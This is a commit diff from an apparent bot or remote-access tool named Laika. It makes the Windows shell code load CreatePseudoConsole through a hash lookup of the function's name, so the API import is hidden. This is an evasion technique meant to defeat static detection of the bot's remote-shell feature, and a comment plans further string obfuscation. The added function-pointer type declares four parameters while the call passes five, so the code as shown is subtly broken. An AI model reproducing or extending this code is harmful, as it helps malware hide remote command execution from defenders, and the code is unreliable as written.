Bot: Added oCreatePseudoConsole to laikaO_init()

2022-07-08 12:54:14 -05:00 · 2022-07-08 12:54:14 -05:00 · 35cbd91dd1
parent f92bbbc85b
commit 35cbd91dd1
3 changed files with 19 additions and 5 deletions
--- a/bot/include/obf.h
+++ b/bot/include/obf.h
@ -4,12 +4,15 @@
 #include "laika.h"

 #ifdef _WIN32
+#    include <process.h>
 #    include <windows.h>

 /* WINAPI types */
 typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, INT);
+typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, HPCON *);

 extern _ShellExecuteA oShellExecuteA;
+extern _CreatePseudoConsole oCreatePseudoConsole;
 #endif

 void laikaO_init();
--- a/bot/win/winobf.c
+++ b/bot/win/winobf.c
@ -129,15 +129,25 @@ _findByHashFail:
 /* ======================================[[ Exposed API ]]====================================== */

 _ShellExecuteA oShellExecuteA;
+_CreatePseudoConsole oCreatePseudoConsole;

 void laikaO_init()
 {
    uint32_t hash;

    /* TODO: these library strings should probably be obfuscated (by a skid box maybe?) */
-    oShellExecuteA = findByHash("shell32.dll", 0x89858cd3);
+    oShellExecuteA = (_ShellExecuteA)findByHash("shell32.dll", 0x89858cd3);
+    oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7);

-    hash = getHashName("ShellExecuteA"); /* 0x89858cd3 */
-    printf("ShellExecuteA: real is %p, hashed is %p. [HASH: %x]\n", (void *)ShellExecuteA,
-           findByHash("shell32.dll", hash), hash);
+/*
+    hash = getHashName("CreateProcessA"); // 0x9e687c1d
+    printf("CreateProcessA: real is %p, hashed is %p. [HASH: %x]\n",
+           (void *)CreateProcessA,
+           findByHash("kernel32.dll", hash), hash);
+
+    hash = getHashName("InitializeProcThreadAttributeList");
+    printf("InitializeProcThreadAttributeList: real is %p, hashed is %p. [HASH: %x]\n",
+           (void *)InitializeProcThreadAttributeList,
+           findByHash("kernel32.dll", hash), hash);
+*/
 }
--- a/bot/win/winshell.c
+++ b/bot/win/winshell.c
@ -1,5 +1,6 @@
 /* platform specific code for opening shells (pseudo consoles) on windows */
 #include "bot.h"
+#include "obf.h"
 #include "lerror.h"
 #include "lmem.h"
 #include "shell.h"
@ -128,7 +129,7 @@ HRESULT CreatePseudoConsoleAndPipes(HPCON *phPC, HANDLE *phPipeIn, HANDLE *phPip
        return HRESULT_FROM_WIN32(GetLastError());

    /* create the pseudo console of the required size, attached to the PTY - end of the pipes */
-    hr = CreatePseudoConsole(consoleSize, hPipePTYIn, hPipePTYOut, 0, phPC);
+    hr = oCreatePseudoConsole(consoleSize, hPipePTYIn, hPipePTYOut, 0, phPC);

    /* we can close the handles to the PTY-end of the pipes here
       because the handles are dup'ed into the ConHost and will be released